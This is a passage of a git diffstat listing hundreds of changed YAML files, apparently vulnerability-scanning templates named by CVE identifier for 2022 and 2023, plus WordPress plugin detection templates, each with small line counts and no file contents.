3 +-- http/cves/2022/CVE-2022-28923.yaml | 3 +-- http/cves/2022/CVE-2022-28955.yaml | 3 +-- http/cves/2022/CVE-2022-29004.yaml | 3 +-- http/cves/2022/CVE-2022-29005.yaml | 3 +-- http/cves/2022/CVE-2022-29014.yaml | 3 +-- http/cves/2022/CVE-2022-29078.yaml | 3 +-- http/cves/2022/CVE-2022-29153.yaml | 3 +-- http/cves/2022/CVE-2022-29272.yaml | 3 +-- http/cves/2022/CVE-2022-29298.yaml | 3 +-- http/cves/2022/CVE-2022-29303.yaml | 3 +-- http/cves/2022/CVE-2022-29349.yaml | 3 +-- http/cves/2022/CVE-2022-29383.yaml | 3 +-- http/cves/2022/CVE-2022-29455.yaml | 3 +-- http/cves/2022/CVE-2022-29464.yaml | 3 +-- http/cves/2022/CVE-2022-29548.yaml | 3 +-- http/cves/2022/CVE-2022-29775.yaml | 3 +-- http/cves/2022/CVE-2022-30073.yaml | 3 +-- http/cves/2022/CVE-2022-30489.yaml | 3 +-- http/cves/2022/CVE-2022-30512.yaml | 3 +-- http/cves/2022/CVE-2022-30513.yaml | 3 +-- http/cves/2022/CVE-2022-30514.yaml | 3 +-- http/cves/2022/CVE-2022-30525.yaml | 3 +-- http/cves/2022/CVE-2022-3062.yaml | 3 +-- http/cves/2022/CVE-2022-30776.yaml | 3 +-- http/cves/2022/CVE-2022-30777.yaml | 3 +-- http/cves/2022/CVE-2022-31268.yaml | 3 +-- http/cves/2022/CVE-2022-31269.yaml | 3 +-- http/cves/2022/CVE-2022-31299.yaml | 3 +-- http/cves/2022/CVE-2022-31373.yaml | 3 +-- http/cves/2022/CVE-2022-3142.yaml | 3 +-- http/cves/2022/CVE-2022-31474.yaml | 3 +-- http/cves/2022/CVE-2022-31499.yaml | 3 +-- http/cves/2022/CVE-2022-31656.yaml | 3 +-- http/cves/2022/CVE-2022-31798.yaml | 3 +-- http/cves/2022/CVE-2022-31814.yaml | 3 +-- http/cves/2022/CVE-2022-31845.yaml | 3 +-- http/cves/2022/CVE-2022-31846.yaml | 3 +-- http/cves/2022/CVE-2022-31847.yaml | 3 +-- http/cves/2022/CVE-2022-31854.yaml | 3 +-- http/cves/2022/CVE-2022-31879.yaml | 3 +-- http/cves/2022/CVE-2022-31974.yaml | 3 +-- http/cves/2022/CVE-2022-31975.yaml | 3 +-- http/cves/2022/CVE-2022-31976.yaml | 3 +-- http/cves/2022/CVE-2022-31977.yaml | 3 +-- http/cves/2022/CVE-2022-31978.yaml | 3 +-- http/cves/2022/CVE-2022-31980.yaml | 3 +-- http/cves/2022/CVE-2022-31981.yaml | 3 +-- http/cves/2022/CVE-2022-31982.yaml | 3 +-- http/cves/2022/CVE-2022-31983.yaml | 3 +-- http/cves/2022/CVE-2022-31984.yaml | 3 +-- http/cves/2022/CVE-2022-32007.yaml | 3 +-- http/cves/2022/CVE-2022-32015.yaml | 3 +-- http/cves/2022/CVE-2022-32018.yaml | 3 +-- http/cves/2022/CVE-2022-32022.yaml | 3 +-- http/cves/2022/CVE-2022-32024.yaml | 3 +-- http/cves/2022/CVE-2022-32025.yaml | 3 +-- http/cves/2022/CVE-2022-32026.yaml | 3 +-- http/cves/2022/CVE-2022-32028.yaml | 3 +-- http/cves/2022/CVE-2022-32094.yaml | 3 +-- http/cves/2022/CVE-2022-32195.yaml | 3 +-- http/cves/2022/CVE-2022-32409.yaml | 3 +-- http/cves/2022/CVE-2022-3242.yaml | 3 +-- http/cves/2022/CVE-2022-32429.yaml | 3 +-- http/cves/2022/CVE-2022-32444.yaml | 3 +-- http/cves/2022/CVE-2022-32770.yaml | 3 +-- http/cves/2022/CVE-2022-33119.yaml | 3 +-- http/cves/2022/CVE-2022-33174.yaml | 3 +-- http/cves/2022/CVE-2022-33901.yaml | 3 +-- http/cves/2022/CVE-2022-33965.yaml | 3 +-- http/cves/2022/CVE-2022-34045.yaml | 3 +-- http/cves/2022/CVE-2022-34046.yaml | 3 +-- http/cves/2022/CVE-2022-34047.yaml | 3 +-- http/cves/2022/CVE-2022-34048.yaml | 3 +-- http/cves/2022/CVE-2022-34049.yaml | 3 +-- http/cves/2022/CVE-2022-34093.yaml | 3 +-- http/cves/2022/CVE-2022-34094.yaml | 3 +-- http/cves/2022/CVE-2022-34121.yaml | 3 +-- http/cves/2022/CVE-2022-34328.yaml | 3 +-- http/cves/2022/CVE-2022-34576.yaml | 3 +-- http/cves/2022/CVE-2022-34590.yaml | 3 +-- http/cves/2022/CVE-2022-3484.yaml | 3 +-- http/cves/2022/CVE-2022-3506.yaml | 3 +-- http/cves/2022/CVE-2022-35151.yaml | 3 +-- http/cves/2022/CVE-2022-35405.yaml | 3 +-- http/cves/2022/CVE-2022-35413.yaml | 3 +-- http/cves/2022/CVE-2022-35416.yaml | 3 +-- http/cves/2022/CVE-2022-35493.yaml | 3 +-- http/cves/2022/CVE-2022-3578.yaml | 3 +-- http/cves/2022/CVE-2022-36537.yaml | 3 +-- http/cves/2022/CVE-2022-36553.yaml | 3 +-- http/cves/2022/CVE-2022-36642.yaml | 3 +-- http/cves/2022/CVE-2022-36804.yaml | 3 +-- http/cves/2022/CVE-2022-36883.yaml | 3 +-- http/cves/2022/CVE-2022-37042.yaml | 3 +-- http/cves/2022/CVE-2022-37153.yaml | 3 +-- http/cves/2022/CVE-2022-37190.yaml | 3 +-- http/cves/2022/CVE-2022-37191.yaml | 3 +-- http/cves/2022/CVE-2022-37299.yaml | 3 +-- http/cves/2022/CVE-2022-3768.yaml | 3 +-- http/cves/2022/CVE-2022-3800.yaml | 3 +-- http/cves/2022/CVE-2022-38295.yaml | 3 +-- http/cves/2022/CVE-2022-38296.yaml | 3 +-- http/cves/2022/CVE-2022-38463.yaml | 3 +-- http/cves/2022/CVE-2022-38467.yaml | 3 +-- http/cves/2022/CVE-2022-38553.yaml | 3 +-- http/cves/2022/CVE-2022-38637.yaml | 3 +-- http/cves/2022/CVE-2022-38794.yaml | 3 +-- http/cves/2022/CVE-2022-38817.yaml | 3 +-- http/cves/2022/CVE-2022-38870.yaml | 3 +-- http/cves/2022/CVE-2022-39048.yaml | 3 +-- http/cves/2022/CVE-2022-3908.yaml | 3 +-- http/cves/2022/CVE-2022-39195.yaml | 3 +-- http/cves/2022/CVE-2022-3933.yaml | 3 +-- http/cves/2022/CVE-2022-3934.yaml | 3 +-- http/cves/2022/CVE-2022-3980.yaml | 3 +-- http/cves/2022/CVE-2022-3982.yaml | 3 +-- http/cves/2022/CVE-2022-39952.yaml | 3 +-- http/cves/2022/CVE-2022-39960.yaml | 3 +-- http/cves/2022/CVE-2022-39986.yaml | 3 +-- http/cves/2022/CVE-2022-40022.yaml | 3 +-- http/cves/2022/CVE-2022-40032.yaml | 3 +-- http/cves/2022/CVE-2022-40047.yaml | 3 +-- http/cves/2022/CVE-2022-40083.yaml | 3 +-- http/cves/2022/CVE-2022-40127.yaml | 3 +-- http/cves/2022/CVE-2022-40359.yaml | 3 +-- http/cves/2022/CVE-2022-4049.yaml | 3 +-- http/cves/2022/CVE-2022-4050.yaml | 3 +-- http/cves/2022/CVE-2022-4057.yaml | 3 +-- http/cves/2022/CVE-2022-4059.yaml | 3 +-- http/cves/2022/CVE-2022-4060.yaml | 3 +-- http/cves/2022/CVE-2022-4063.yaml | 3 +-- http/cves/2022/CVE-2022-40734.yaml | 3 +-- http/cves/2022/CVE-2022-40843.yaml | 3 +-- http/cves/2022/CVE-2022-40879.yaml | 3 +-- http/cves/2022/CVE-2022-40881.yaml | 3 +-- http/cves/2022/CVE-2022-4117.yaml | 3 +-- http/cves/2022/CVE-2022-4140.yaml | 3 +-- http/cves/2022/CVE-2022-41441.yaml | 3 +-- http/cves/2022/CVE-2022-41473.yaml | 3 +-- http/cves/2022/CVE-2022-41840.yaml | 3 +-- http/cves/2022/CVE-2022-42094.yaml | 3 +-- http/cves/2022/CVE-2022-42095.yaml | 3 +-- http/cves/2022/CVE-2022-42096.yaml | 3 +-- http/cves/2022/CVE-2022-42233.yaml | 3 +-- http/cves/2022/CVE-2022-4260.yaml | 3 +-- http/cves/2022/CVE-2022-42746.yaml | 3 +-- http/cves/2022/CVE-2022-42747.yaml | 3 +-- http/cves/2022/CVE-2022-42748.yaml | 3 +-- http/cves/2022/CVE-2022-42749.yaml | 3 +-- http/cves/2022/CVE-2022-4295.yaml | 3 +-- http/cves/2022/CVE-2022-4301.yaml | 3 +-- http/cves/2022/CVE-2022-43014.yaml | 3 +-- http/cves/2022/CVE-2022-43015.yaml | 3 +-- http/cves/2022/CVE-2022-43016.yaml | 3 +-- http/cves/2022/CVE-2022-43017.yaml | 3 +-- http/cves/2022/CVE-2022-43018.yaml | 3 +-- http/cves/2022/CVE-2022-4305.yaml | 3 +-- http/cves/2022/CVE-2022-4306.yaml | 3 +-- http/cves/2022/CVE-2022-43140.yaml | 3 +-- http/cves/2022/CVE-2022-43164.yaml | 3 +-- http/cves/2022/CVE-2022-43165.yaml | 3 +-- http/cves/2022/CVE-2022-43166.yaml | 3 +-- http/cves/2022/CVE-2022-43167.yaml | 3 +-- http/cves/2022/CVE-2022-43169.yaml | 3 +-- http/cves/2022/CVE-2022-43170.yaml | 3 +-- http/cves/2022/CVE-2022-43185.yaml | 3 +-- http/cves/2022/CVE-2022-4320.yaml | 3 +-- http/cves/2022/CVE-2022-4321.yaml | 3 +-- http/cves/2022/CVE-2022-4325.yaml | 3 +-- http/cves/2022/CVE-2022-4328.yaml | 3 +-- http/cves/2022/CVE-2022-43769.yaml | 3 +-- http/cves/2022/CVE-2022-44290.yaml | 3 +-- http/cves/2022/CVE-2022-44291.yaml | 3 +-- http/cves/2022/CVE-2022-4447.yaml | 3 +-- http/cves/2022/CVE-2022-44944.yaml | 3 +-- http/cves/2022/CVE-2022-44946.yaml | 3 +-- http/cves/2022/CVE-2022-44947.yaml | 3 +-- http/cves/2022/CVE-2022-44948.yaml | 3 +-- http/cves/2022/CVE-2022-44949.yaml | 3 +-- http/cves/2022/CVE-2022-44950.yaml | 3 +-- http/cves/2022/CVE-2022-44951.yaml | 3 +-- http/cves/2022/CVE-2022-44952.yaml | 3 +-- http/cves/2022/CVE-2022-44957.yaml | 3 +-- http/cves/2022/CVE-2022-45037.yaml | 3 +-- http/cves/2022/CVE-2022-45038.yaml | 3 +-- http/cves/2022/CVE-2022-45917.yaml | 3 +-- http/cves/2022/CVE-2022-45933.yaml | 3 +-- http/cves/2022/CVE-2022-46020.yaml | 3 +-- http/cves/2022/CVE-2022-46071.yaml | 3 +-- http/cves/2022/CVE-2022-46073.yaml | 3 +-- http/cves/2022/CVE-2022-46169.yaml | 3 +-- http/cves/2022/CVE-2022-46381.yaml | 3 +-- http/cves/2022/CVE-2022-46443.yaml | 3 +-- http/cves/2022/CVE-2022-46463.yaml | 3 +-- http/cves/2022/CVE-2022-46888.yaml | 3 +-- http/cves/2022/CVE-2022-46934.yaml | 3 +-- http/cves/2022/CVE-2022-47002.yaml | 3 +-- http/cves/2022/CVE-2022-47003.yaml | 3 +-- http/cves/2022/CVE-2022-47075.yaml | 3 +-- http/cves/2022/CVE-2022-47615.yaml | 3 +-- http/cves/2022/CVE-2022-47945.yaml | 3 +-- http/cves/2022/CVE-2022-47966.yaml | 3 +-- http/cves/2022/CVE-2022-47986.yaml | 3 +-- http/cves/2022/CVE-2022-48012.yaml | 3 +-- http/cves/2022/CVE-2022-48165.yaml | 3 +-- http/cves/2022/CVE-2022-48197.yaml | 3 +-- http/cves/2022/CVE-2022-4897.yaml | 3 +-- http/cves/2023/CVE-2023-0099.yaml | 3 +-- http/cves/2023/CVE-2023-0126.yaml | 3 +-- http/cves/2023/CVE-2023-0236.yaml | 3 +-- http/cves/2023/CVE-2023-0261.yaml | 3 +-- http/cves/2023/CVE-2023-0334.yaml | 3 +-- http/cves/2023/CVE-2023-0448.yaml | 3 +-- http/cves/2023/CVE-2023-0514.yaml | 3 +-- http/cves/2023/CVE-2023-0527.yaml | 3 +-- http/cves/2023/CVE-2023-0552.yaml | 3 +-- http/cves/2023/CVE-2023-0562.yaml | 3 +-- http/cves/2023/CVE-2023-0563.yaml | 3 +-- http/cves/2023/CVE-2023-0600.yaml | 3 +-- http/cves/2023/CVE-2023-0602.yaml | 3 +-- http/cves/2023/CVE-2023-0630.yaml | 3 +-- http/cves/2023/CVE-2023-0669.yaml | 3 +-- http/cves/2023/CVE-2023-0777.yaml | 3 +-- http/cves/2023/CVE-2023-0900.yaml | 3 +-- http/cves/2023/CVE-2023-0942.yaml | 3 +-- http/cves/2023/CVE-2023-0947.yaml | 3 +-- http/cves/2023/CVE-2023-0948.yaml | 3 +-- http/cves/2023/CVE-2023-0968.yaml | 3 +-- http/cves/2023/CVE-2023-1020.yaml | 3 +-- http/cves/2023/CVE-2023-1080.yaml | 3 +-- http/cves/2023/CVE-2023-1177.yaml | 3 +-- http/cves/2023/CVE-2023-1263.yaml | 3 +-- http/cves/2023/CVE-2023-1362.yaml | 3 +-- http/cves/2023/CVE-2023-1408.yaml | 3 +-- http/cves/2023/CVE-2023-1454.yaml | 3 +-- http/cves/2023/CVE-2023-1496.yaml | 3 +-- http/cves/2023/CVE-2023-1546.yaml | 3 +-- http/cves/2023/CVE-2023-1671.yaml | 3 +-- http/cves/2023/CVE-2023-1698.yaml | 3 +-- http/cves/2023/CVE-2023-1730.yaml | 3 +-- http/cves/2023/CVE-2023-1780.yaml | 3 +-- http/cves/2023/CVE-2023-1835.yaml | 3 +-- http/cves/2023/CVE-2023-1880.yaml | 3 +-- http/cves/2023/CVE-2023-1890.yaml | 3 +-- http/cves/2023/CVE-2023-20073.yaml | 3 +-- http/cves/2023/CVE-2023-2009.yaml | 3 +-- http/cves/2023/CVE-2023-20198.yaml | 3 +-- http/cves/2023/CVE-2023-2023.yaml | 3 +-- http/cves/2023/CVE-2023-20864.yaml | 3 +-- http/cves/2023/CVE-2023-20887.yaml | 3 +-- http/cves/2023/CVE-2023-20888.yaml | 3 +-- http/cves/2023/CVE-2023-20889.yaml | 3 +-- http/cves/2023/CVE-2023-2122.yaml | 3 +-- http/cves/2023/CVE-2023-2130.yaml | 3 +-- http/cves/2023/CVE-2023-2178.yaml | 3 +-- http/cves/2023/CVE-2023-2224.yaml | 3 +-- http/cves/2023/CVE-2023-22432.yaml | 3 +-- http/cves/2023/CVE-2023-22463.yaml | 3 +-- http/cves/2023/CVE-2023-22478.yaml | 3 +-- http/cves/2023/CVE-2023-22480.yaml | 3 +-- http/cves/2023/CVE-2023-22515.yaml | 3 +-- http/cves/2023/CVE-2023-22518.yaml | 3 +-- http/cves/2023/CVE-2023-22620.yaml | 3 +-- http/cves/2023/CVE-2023-2272.yaml | 3 +-- http/cves/2023/CVE-2023-22897.yaml | 3 +-- http/cves/2023/CVE-2023-23161.yaml | 3 +-- http/cves/2023/CVE-2023-23333.yaml | 3 +-- http/cves/2023/CVE-2023-23488.yaml | 3 +-- http/cves/2023/CVE-2023-23491.yaml | 3 +-- http/cves/2023/CVE-2023-23492.yaml | 3 +-- http/cves/2023/CVE-2023-2356.yaml | 3 +-- http/cves/2023/CVE-2023-23752.yaml | 3 +-- http/cves/2023/CVE-2023-24044.yaml | 3 +-- http/cves/2023/CVE-2023-24243.yaml | 3 +-- http/cves/2023/CVE-2023-24278.yaml | 3 +-- http/cves/2023/CVE-2023-24322.yaml | 3 +-- http/cves/2023/CVE-2023-24488.yaml | 3 +-- http/cves/2023/CVE-2023-24489.yaml | 3 +-- http/cves/2023/CVE-2023-24657.yaml | 3 +-- http/cves/2023/CVE-2023-24733.yaml | 3 +-- http/cves/2023/CVE-2023-24735.yaml | 3 +-- http/cves/2023/CVE-2023-24737.yaml | 3 +-- http/cves/2023/CVE-2023-25135.yaml | 3 +-- http/cves/2023/CVE-2023-25157.yaml | 3 +-- http/cves/2023/CVE-2023-25346.yaml | 3 +-- http/cves/2023/CVE-2023-25573.yaml | 3 +-- http/cves/2023/CVE-2023-25717.yaml | 3 +-- http/cves/2023/CVE-2023-26067.yaml | 3 +-- http/cves/2023/CVE-2023-26255.yaml | 3 +-- http/cves/2023/CVE-2023-26256.yaml | 3 +-- http/cves/2023/CVE-2023-26360.yaml | 3 +-- http/cves/2023/CVE-2023-2648.yaml | 3 +-- http/cves/2023/CVE-2023-26842.yaml | 3 +-- http/cves/2023/CVE-2023-26843.yaml | 3 +-- http/cves/2023/CVE-2023-27008.yaml | 3 +-- http/cves/2023/CVE-2023-27034.yaml | 3 +-- http/cves/2023/CVE-2023-27159.yaml | 3 +-- http/cves/2023/CVE-2023-27179.yaml | 3 +-- http/cves/2023/CVE-2023-27292.yaml | 3 +-- http/cves/2023/CVE-2023-2732.yaml | 3 +-- http/cves/2023/CVE-2023-27372.yaml | 3 +-- http/cves/2023/CVE-2023-27482.yaml | 3 +-- http/cves/2023/CVE-2023-27524.yaml | 3 +-- http/cves/2023/CVE-2023-27587.yaml | 3 +-- http/cves/2023/CVE-2023-2766.yaml | 3 +-- http/cves/2023/CVE-2023-2779.yaml | 3 +-- http/cves/2023/CVE-2023-2780.yaml | 3 +-- http/cves/2023/CVE-2023-27922.yaml | 3 +-- http/cves/2023/CVE-2023-2796.yaml | 3 +-- http/cves/2023/CVE-2023-28121.yaml | 3 +-- http/cves/2023/CVE-2023-2813.yaml | 3 +-- http/cves/2023/CVE-2023-2822.yaml | 3 +-- http/cves/2023/CVE-2023-2825.yaml | 3 +-- http/cves/2023/CVE-2023-28343.yaml | 3 +-- http/cves/2023/CVE-2023-28432.yaml | 3 +-- http/cves/2023/CVE-2023-28665.yaml | 3 +-- http/cves/2023/CVE-2023-29298.yaml | 3 +-- http/cves/2023/CVE-2023-29300.yaml | 3 +-- http/cves/2023/CVE-2023-29357.yaml | 3 +-- http/cves/2023/CVE-2023-29439.yaml | 3 +-- http/cves/2023/CVE-2023-29489.yaml | 3 +-- http/cves/2023/CVE-2023-29622.yaml | 3 +-- http/cves/2023/CVE-2023-29623.yaml | 3 +-- http/cves/2023/CVE-2023-2982.yaml | 3 +-- http/cves/2023/CVE-2023-29887.yaml | 3 +-- http/cves/2023/CVE-2023-29919.yaml | 3 +-- http/cves/2023/CVE-2023-29922.yaml | 3 +-- http/cves/2023/CVE-2023-29923.yaml | 3 +-- http/cves/2023/CVE-2023-30013.yaml | 3 +-- http/cves/2023/CVE-2023-30019.yaml | 3 +-- http/cves/2023/CVE-2023-30150.yaml | 3 +-- http/cves/2023/CVE-2023-30210.yaml | 3 +-- http/cves/2023/CVE-2023-30212.yaml | 3 +-- http/cves/2023/CVE-2023-30256.yaml | 3 +-- http/cves/2023/CVE-2023-30625.yaml | 3 +-- http/cves/2023/CVE-2023-30777.yaml | 3 +-- http/cves/2023/CVE-2023-30868.yaml | 3 +-- http/cves/2023/CVE-2023-30943.yaml | 3 +-- http/cves/2023/CVE-2023-31059.yaml | 3 +-- http/cves/2023/CVE-2023-31465.yaml | 3 +-- http/cves/2023/CVE-2023-31548.yaml | 3 +-- http/cves/2023/CVE-2023-3219.yaml | 3 +-- http/cves/2023/CVE-2023-32235.yaml | 3 +-- http/cves/2023/CVE-2023-32243.yaml | 3 +-- http/cves/2023/CVE-2023-32563.yaml | 3 +-- http/cves/2023/CVE-2023-33338.yaml | 3 +-- http/cves/2023/CVE-2023-33405.yaml | 3 +-- http/cves/2023/CVE-2023-33439.yaml | 3 +-- http/cves/2023/CVE-2023-33440.yaml | 3 +-- http/cves/2023/CVE-2023-3345.yaml | 3 +-- http/cves/2023/CVE-2023-33510.yaml | 3 +-- http/cves/2023/CVE-2023-33568.yaml | 3 +-- http/cves/2023/CVE-2023-33584.yaml | 3 +-- http/cves/2023/CVE-2023-33629.yaml | 3 +-- http/cves/2023/CVE-2023-33831.yaml | 3 +-- http/cves/2023/CVE-2023-34124.yaml | 3 +-- http/cves/2023/CVE-2023-34192.yaml | 3 +-- http/cves/2023/CVE-2023-34259.yaml | 3 +-- http/cves/2023/CVE-2023-34362.yaml | 3 +-- http/cves/2023/CVE-2023-34537.yaml | 3 +-- http/cves/2023/CVE-2023-34598.yaml | 3 +-- http/cves/2023/CVE-2023-34599.yaml | 3 +-- http/cves/2023/CVE-2023-34659.yaml | 3 +-- http/cves/2023/CVE-2023-34751.yaml | 3 +-- http/cves/2023/CVE-2023-34752.yaml | 3 +-- http/cves/2023/CVE-2023-34753.yaml | 3 +-- http/cves/2023/CVE-2023-34755.yaml | 3 +-- http/cves/2023/CVE-2023-34756.yaml | 3 +-- http/cves/2023/CVE-2023-3479.yaml | 3 +-- http/cves/2023/CVE-2023-34843.yaml | 3 +-- http/cves/2023/CVE-2023-34960.yaml | 3 +-- http/cves/2023/CVE-2023-35082.yaml | 3 +-- http/cves/2023/CVE-2023-35813.yaml | 3 +-- http/cves/2023/CVE-2023-35843.yaml | 3 +-- http/cves/2023/CVE-2023-35844.yaml | 3 +-- http/cves/2023/CVE-2023-35885.yaml | 3 +-- http/cves/2023/CVE-2023-36287.yaml | 3 +-- http/cves/2023/CVE-2023-36289.yaml | 3 +-- http/cves/2023/CVE-2023-36306.yaml | 3 +-- http/cves/2023/CVE-2023-36346.yaml | 3 +-- http/cves/2023/CVE-2023-36844.yaml | 3 +-- http/cves/2023/CVE-2023-36845.yaml | 3 +-- http/cves/2023/CVE-2023-36934.yaml | 3 +-- http/cves/2023/CVE-2023-3710.yaml | 3 +-- http/cves/2023/CVE-2023-37265.yaml | 3 +-- http/cves/2023/CVE-2023-37266.yaml | 3 +-- http/cves/2023/CVE-2023-37270.yaml | 3 +-- http/cves/2023/CVE-2023-37462.yaml | 3 +-- http/cves/2023/CVE-2023-37474.yaml | 3 +-- http/cves/2023/CVE-2023-37580.yaml | 3 +-- http/cves/2023/CVE-2023-37629.yaml | 3 +-- http/cves/2023/CVE-2023-3765.yaml | 3 +-- http/cves/2023/CVE-2023-37679.yaml | 3 +-- http/cves/2023/CVE-2023-37728.yaml | 3 +-- http/cves/2023/CVE-2023-37979.yaml | 3 +-- http/cves/2023/CVE-2023-38205.yaml | 3 +-- http/cves/2023/CVE-2023-3836.yaml | 3 +-- http/cves/2023/CVE-2023-3843.yaml | 3 +-- http/cves/2023/CVE-2023-38433.yaml | 3 +-- http/cves/2023/CVE-2023-3844.yaml | 3 +-- http/cves/2023/CVE-2023-3845.yaml | 3 +-- http/cves/2023/CVE-2023-3846.yaml | 3 +-- http/cves/2023/CVE-2023-3847.yaml | 3 +-- http/cves/2023/CVE-2023-3848.yaml | 3 +-- http/cves/2023/CVE-2023-3849.yaml | 3 +-- http/cves/2023/CVE-2023-38501.yaml | 3 +-- http/cves/2023/CVE-2023-38646.yaml | 3 +-- http/cves/2023/CVE-2023-39026.yaml | 3 +-- http/cves/2023/CVE-2023-39108.yaml | 3 +-- http/cves/2023/CVE-2023-39109.yaml | 3 +-- http/cves/2023/CVE-2023-39110.yaml | 3 +-- http/cves/2023/CVE-2023-39141.yaml | 3 +-- http/cves/2023/CVE-2023-39143.yaml | 3 +-- http/cves/2023/CVE-2023-3936.yaml | 3 +-- http/cves/2023/CVE-2023-39361.yaml | 3 +-- http/cves/2023/CVE-2023-39598.yaml | 3 +-- http/cves/2023/CVE-2023-39600.yaml | 3 +-- http/cves/2023/CVE-2023-39676.yaml | 3 +-- http/cves/2023/CVE-2023-39677.yaml | 3 +-- http/cves/2023/CVE-2023-39700.yaml | 3 +-- http/cves/2023/CVE-2023-40208.yaml | 3 +-- http/cves/2023/CVE-2023-40779.yaml | 3 +-- http/cves/2023/CVE-2023-4110.yaml | 3 +-- http/cves/2023/CVE-2023-4111.yaml | 3 +-- http/cves/2023/CVE-2023-4112.yaml | 3 +-- http/cves/2023/CVE-2023-4113.yaml | 3 +-- http/cves/2023/CVE-2023-4114.yaml | 3 +-- http/cves/2023/CVE-2023-4115.yaml | 3 +-- http/cves/2023/CVE-2023-4116.yaml | 3 +-- http/cves/2023/CVE-2023-4148.yaml | 3 +-- http/cves/2023/CVE-2023-41538.yaml | 3 +-- http/cves/2023/CVE-2023-41642.yaml | 3 +-- http/cves/2023/CVE-2023-4168.yaml | 3 +-- http/cves/2023/CVE-2023-4169.yaml | 3 +-- http/cves/2023/CVE-2023-4173.yaml | 3 +-- http/cves/2023/CVE-2023-4174.yaml | 3 +-- http/cves/2023/CVE-2023-41892.yaml | 3 +-- http/cves/2023/CVE-2023-42442.yaml | 3 +-- http/cves/2023/CVE-2023-43261.yaml | 3 +-- http/cves/2023/CVE-2023-43795.yaml | 3 +-- http/cves/2023/CVE-2023-4415.yaml | 3 +-- http/cves/2023/CVE-2023-4451.yaml | 3 +-- http/cves/2023/CVE-2023-4547.yaml | 3 +-- http/cves/2023/CVE-2023-4568.yaml | 3 +-- http/cves/2023/CVE-2023-45852.yaml | 3 +-- http/cves/2023/CVE-2023-4634.yaml | 3 +-- http/cves/2023/CVE-2023-46747.yaml | 3 +-- http/cves/2023/CVE-2023-4714.yaml | 3 +-- http/cves/2023/CVE-2023-4966.yaml | 3 +-- http/cves/2023/CVE-2023-4974.yaml | 3 +-- http/cves/2023/CVE-2023-5074.yaml | 3 +-- http/cves/2023/CVE-2023-5244.yaml | 3 +-- http/cves/2023/CVE-2023-5360.yaml | 3 +-- http/misconfiguration/installer/sugarcrm-install.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- http/technologies/wordpress/plugins/add-to-any.yaml | 3 +-- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- http/technologies/wordpress/plugins/akismet.yaml | 3 +-- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 3 +-- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- http/technologies/wordpress/plugins/amp.yaml | 3 +-- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- http/technologies/wordpress/plugins/astra-sites.yaml | 3 +-- http/technologies/wordpress/plugins/astra-widgets.yaml | 3 +-- http/technologies/wordpress/plugins/autoptimize.yaml | 3 +-- http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- http/technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- http/technologies/wordpress/plugins/breeze.yaml | 3 +-- http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- .../wordpress/plugins/child-theme-configurator.yaml | 3 +-- http/technologies/wordpress/plugins/classic-editor.yaml | 3 +-- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- http/technologies/wordpress/plugins/cmb2.yaml | 3 +-- http/technologies/wordpress/plugins/coblocks.yaml | 3 +-- http/technologies/wordpress/plugins/code-snippets.yaml | 3 +-- http/technologies/wordpress/plugins/coming-soon.yaml | 3 +-- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- http/technologies/wordpress/plugins/disable-comments.yaml | 3 +-- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- http/technologies/wordpress/plugins/duplicator.yaml | 3 +-- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- http/technologies/wordpress/plugins/easy-fancybox.yaml | 3 +-- .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 3 +-- http/technologies/wordpress/plugins/elementskit-lite.yaml | 3 +-- http/technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- http/technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 3 +-- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 3 +-- .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 3 +-- http/technologies/wordpress/plugins/flamingo.yaml | 3 +-- http/technologies/wordpress/plugins/fluentform.yaml | 3 +-- http/technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/formidable.yaml | 3 +-- http/technologies/wordpress/plugins/forminator.yaml | 3 +-- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- 